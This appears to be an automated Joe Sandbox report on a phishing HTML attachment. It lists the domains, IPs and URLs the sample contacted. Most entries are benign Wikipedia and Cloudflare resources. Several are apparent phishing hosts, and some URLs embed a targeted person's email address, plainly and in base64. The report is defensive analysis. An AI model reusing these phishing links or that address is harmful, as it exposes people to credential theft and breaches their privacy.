https://softtrader.eu/blog-microsoft/windows-server-2019-essentials-standard-datacenter/0%Avira URL Cloudsafe
https://abb0tt.net/oE8X9WywTktHJv7UszfC03GYzrl8oqZFRQJtR4IaS5hxhlRE6jLcAUFZNYekEs1X0dq1Tz3QFbpOuP5a8mL65fotnVc7WvrPHGqxxZNMDhiIHDuv7PiQgAKb4VSOcyogyLa92dTleCGsf0M2JUBwbM/index?a=c3VzYW4uYW5kcmV3c0BqZWZmcGFyaXNoLm5ldA%3D%3D0%Avira URL Cloudsafe
https://tiny-hat-eab8.pagenew.workers.dev0%Avira URL Cloudsafe
https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf50%Avira URL Cloudsafe
https://wikimediafoundation.org/0%Avira URL Cloudsafe
https://porposal-ach.pages.dev/favicon.ico0%Avira URL Cloudsafe
https://www.tigera.io/tigera-products/userco/0%Avira URL Cloudsafe
https://arab-oil.online0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
tiny-hat-eab8.pagenew.workers.dev
188.114.96.3
truefalse
    high
    code.jquery.com
    151.101.66.137
    truefalse
      high
      challenges.cloudflare.com
      104.18.95.41
      truefalse
        high
        www.google.com
        142.250.185.196
        truefalse
          high
          upload.wikimedia.org
          185.15.59.240
          truefalse
            high
            dyna.wikimedia.org
            185.15.59.224
            truefalse
              high
              porposal-ach.pages.dev
              172.66.47.74
              truefalse
                high
                natrium100gram.site
                194.163.42.36
                truefalse
                  high
                  abb0tt.net
                  165.140.202.235
                  truetrue
                    unknown
                    href.li
                    192.0.78.26
                    truefalse
                      high
                      cdn.jsdelivr.net
                      unknown
                      unknownfalse
                        high
                        login.wikimedia.org
                        unknown
                        unknownfalse
                          high
                          en.wikipedia.org
                          unknown
                          unknownfalse
                            high
                            meta.wikimedia.org
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/false
                                high
                                https://tiny-hat-eab8.pagenew.workers.dev/false
                                • Avira URL Cloud: safe
                                unknown
                                https://href.li/?https://en.wikipedia.org/wiki/Windows_Server_2019false
                                  high
                                  https://en.wikipedia.org/w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1mjy2false
                                    high
                                    https://en.wikipedia.org/w/load.php?lang=en&modules=mmv&skin=vector-2022&version=xvmbsfalse
                                      high
                                      https://porposal-ach.pages.dev/#?service=YzNWellXNHVZVzVrY21WM2MwQnFaV1ptY0dGeWFYTm9MbTVsZEE9PSZ0ZXMyJmE=false
                                        unknown
                                        https://en.wikipedia.org/api/rest_v1/page/summary/Software_release_life_cyclefalse
                                          high
                                          https://en.wikipedia.org/static/favicon/wikipedia.icofalse
                                            high
                                            https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.referencePreviews%7Cext.math.popup%7Cext.popups.main&skin=vector-2022&version=1qfqifalse
                                              high
                                              https://abb0tt.net/#susan.andrews@jeffparish.nettrue
                                                unknown
                                                https://login.wikimedia.org/wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=scriptfalse
                                                  high
                                                  https://porposal-ach.pages.dev/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://en.wikipedia.org/w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7ufalse
                                                    high
                                                    https://en.wikipedia.org/wiki/Special:CentralAutoLogin/start?type=scriptfalse
                                                      high
                                                      https://en.wikipedia.org/w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64dfalse
                                                        high
                                                        https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=11c23false
                                                          high
                                                          https://abb0tt.net/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://natrium100gram.site/public/api/validate_key/tes2false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          file:///C:/Users/user/Desktop/ATT562720.htmtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGofalse
                                                            high
                                                            https://en.wikipedia.org/w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022false
                                                              high
                                                              https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://upload.wikimedia.org/wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.pngfalse
                                                                high
                                                                https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5#susan.andrews@jeffparish.netfalse
                                                                  unknown
                                                                  https://porposal-ach.pages.dev/favicon.icofalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23false
                                                                    high
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe5cd656b664309/1736272355861/hkBWC5gd4FFlI6bfalse
                                                                      high
                                                                      https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                                        high
                                                                        https://upload.wikimedia.org/wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.pngfalse
                                                                          high
                                                                          https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                            high
                                                                            https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-wordmark-en.svgfalse
                                                                              high
                                                                              https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-tagline-en.svgfalse
                                                                                high
                                                                                https://code.jquery.com/jquery-3.7.1.min.jsfalse
                                                                                  high
                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fe5cd656b664309/1736272355851/dedc7b011d73c1bf6e1bc0d43b269d006b7b0ba3cc013e3b5183795105288edc/6-1OoBsC45h5gCafalse
                                                                                    high
                                                                                    https://upload.wikimedia.org/wikipedia/en/thumb/e/ed/Windows_Server_2019_desktop_screenshot.png/300px-Windows_Server_2019_desktop_screenshot.pngfalse
                                                                                      high
                                                                                      https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Windows_10_Logo.svg/200px-Windows_10_Logo.svg.pngfalse
                                                                                        high
                                                                                        https://en.wikipedia.org/api/rest_v1/page/summary/Programmerfalse
                                                                                          high
                                                                                          https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Windows_Server_2019_logo_%28official%29.svg/200px-Windows_Server_2019_logo_%28official%29.svg.pngfalse
                                                                                            high
                                                                                            https://abb0tt.net/oE8X9WywTktHJv7UszfC03GYzrl8oqZFRQJtR4IaS5hxhlRE6jLcAUFZNYekEs1X0dq1Tz3QFbpOuP5a8mL65fotnVc7WvrPHGqxxZNMDhiIHDuv7PiQgAKb4VSOcyogyLa92dTleCGsf0M2JUBwbM/index?a=c3VzYW4uYW5kcmV3c0BqZWZmcGFyaXNoLm5ldA%3D%3Dfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                                              high
                                                                                              https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022false
                                                                                                high
                                                                                                https://en.wikipedia.org/w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1kwgafalse
                                                                                                  high
                                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe5cd656b664309&lang=autofalse
                                                                                                    high
                                                                                                    https://en.wikipedia.org/static/images/icons/wikipedia.pngfalse
                                                                                                      high
                                                                                                      https://en.wikipedia.org/static/images/project-logos/enwiki.pngfalse
                                                                                                        high
                                                                                                        https://en.wikipedia.org/wiki/Windows_Server_2019false
                                                                                                          high
                                                                                                          https://en.wikipedia.org/w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022false
                                                                                                            high
                                                                                                            https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=11c23false
                                                                                                              high
                                                                                                              https://en.wikipedia.org/wiki/Windows_Server_2019#DummyBotfalse
                                                                                                                high
                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                https://intake-analytics.wikimedia.orgchromecache_87.2.dr, chromecache_143.2.drfalse
                                                                                                                  high
                                                                                                                  https://natrium100gram.site/public/api/validate_key/$chromecache_121.2.dr, chromecache_122.2.dr, chromecache_104.2.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://phabricator.wikimedia.org/maniphest/task/create/?projects=PHID-PROJ-cabyqp5sf4hyvauln3sqchromecache_108.2.dr, chromecache_152.2.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/320px-Software_dev2.svg.chromecache_90.2.dr, chromecache_146.2.drfalse
                                                                                                                    high
                                                                                                                    https://blogs.windows.com/windowsdeveloper/2018/12/11/windows-server-2019-includes-openssh/chromecache_140.2.drfalse
                                                                                                                      high
                                                                                                                      https://porposal-ach.pages.dev/#?service=chromecache_112.2.dr, chromecache_85.2.drtrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Usechromecache_140.2.drfalse
                                                                                                                        high
                                                                                                                        https://www.networkworld.com/article/3265052/top-6-features-in-windows-server-2019.htmlchromecache_140.2.drfalse
                                                                                                                          high
                                                                                                                          https://upload.wikimedia.org/wikipedia/commons/c/c0/MediaWiki_footer_link_ltr.svgchromecache_100.2.dr, chromecache_150.2.drfalse
                                                                                                                            high
                                                                                                                            https://developer.wikimedia.orgchromecache_140.2.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://web.archive.org/web/20190923212522/https://www.networkworld.com/article/3265052/top-6-featurchromecache_140.2.drfalse
                                                                                                                              high
                                                                                                                              https://www.wikidata.orgchromecache_148.2.dr, chromecache_98.2.drfalse
                                                                                                                                high
                                                                                                                                https://www.mediawiki.org/wiki/Specs/HTML/2.8.0chromecache_134.2.dr, chromecache_127.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://creativecommons.org/licenses/by-sa/4.0/deed.enchromecache_140.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.mediawiki.org/wiki/Specs/Summary/1.2.0chromecache_137.2.dr, chromecache_151.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.mediawiki.org/wiki/Manual:Messages_API#Feature_support_in_JavaScriptchromecache_134.2.dr, chromecache_127.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://web.archive.org/web/20190202205420/https://www.computerworld.com/article/3311978/microsoft-wchromecache_140.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policychromecache_140.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/300px-Software_dev2.svg.chromecache_90.2.dr, chromecache_146.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://login.wikimedia.org/wiki/Special:CentralAutoLogin/start?useformat=desktop&type=1x1&uchromecache_140.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conductchromecache_140.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://intake-analytics.wikimedia.org/v1/events?hasty=truechromecache_87.2.dr, chromecache_143.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://softtrader.eu/blog-microsoft/windows-server-2019-essentials-standard-datacenter/chromecache_140.2.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.zdnet.com/article/new-windows-server-2019-test-build-adds-more-clustering-features/chromecache_140.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.computerworld.com/article/3311978/microsoft-windows/microsoft-yanks-buggy-win10-1809-upgchromecache_140.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.mediawiki.org/wiki/Extension:VisualEditor/Skin_requirementschromecache_134.2.dr, chromecache_127.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statementchromecache_140.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://upload.wikimedia.org/wikipedia/en/e/ed/Windows_Server_2019_desktop_screenshot.pngchromecache_140.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://upload.wikimedia.org/wikipedia/commons/thumb/8/8c/Two_women_operating_ENIAC_%28full_resolutichromecache_139.2.dr, chromecache_123.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://arab-oil.onlinechromecache_121.2.dr, chromecache_122.2.dr, chromecache_104.2.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://geohack.toolforge.org/geohack.php?pagename=chromecache_108.2.dr, chromecache_152.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://tiny-hat-eab8.pagenew.workers.devchromecache_144.2.dr, chromecache_94.2.drfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://intake-logging.wikimedia.org/v1/events?hasty=truechromecache_87.2.dr, chromecache_143.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.wikidata.org/wiki/Special:EntityPage/Q50911826chromecache_140.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://redux.js.org/api-reference/store#subscribe(listener)chromecache_151.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://upload.wikimedia.org/wikipedia/commons/8/8c/Two_women_operating_ENIAC_%28full_resolution%29.chromecache_139.2.dr, chromecache_123.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.wikidata.org/w/api.phpchromecache_87.2.dr, chromecache_143.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.wikidata.org/wiki/Special:EntityPage/Q50911826#sitelinks-wikipediachromecache_140.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.mediawiki.org/w/api.phpchromecache_87.2.dr, chromecache_143.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.tigera.io/tigera-products/userco/chromecache_140.2.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.mediawiki.org/chromecache_140.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://wikimediafoundation.org/chromecache_140.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://donate.wikimedia.org/?wmf_source=donate&wmf_medium=sidebar&wmf_campaign=en.wikipediachromecache_140.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://commons.wikimedia.org/wiki/Category:Windows_Server_2019chromecache_140.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://web.archive.org/web/20190329192750/https://www.zdnet.com/article/new-windows-server-2019-teschromecache_140.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                        194.163.42.36
                                                                                                                                                                                        natrium100gram.siteGermany
                                                                                                                                                                                        6659NEXINTO-DEfalse
                                                                                                                                                                                        104.18.94.41
                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        104.18.95.41
                                                                                                                                                                                        challenges.cloudflare.comUnited States
                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        151.101.130.137
                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                        185.15.59.224
                                                                                                                                                                                        dyna.wikimedia.orgNetherlands
                                                                                                                                                                                        14907WIKIMEDIAUSfalse
                                                                                                                                                                                        172.66.47.74
                                                                                                                                                                                        porposal-ach.pages.devUnited States
                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        192.0.78.26
                                                                                                                                                                                        href.liUnited States
                                                                                                                                                                                        2635AUTOMATTICUSfalse
                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                        142.250.185.196
                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                        185.15.59.240
                                                                                                                                                                                        upload.wikimedia.orgNetherlands
                                                                                                                                                                                        14907WIKIMEDIAUSfalse
                                                                                                                                                                                        188.114.96.3
                                                                                                                                                                                        tiny-hat-eab8.pagenew.workers.devEuropean Union
                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        151.101.66.137
                                                                                                                                                                                        code.jquery.comUnited States
                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                        165.140.202.235
                                                                                                                                                                                        abb0tt.netReserved
                                                                                                                                                                                        2381WISCNET1-ASUStrue
                                                                                                                                                                                        IP
                                                                                                                                                                                        192.168.2.16
                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                        Analysis ID:1585508
                                                                                                                                                                                        Start date and time:2025-01-07 18:51:50 +01:00
                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                        Overall analysis duration:0h 4m 22s
                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                        Report type:full
                                                                                                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                        Technologies:
                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                        Sample name:ATT562720.htm
                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                        Classification:mal60.phis.evad.winHTM@20/114@46/14
                                                                                                                                                                                        EGA Information:Failed
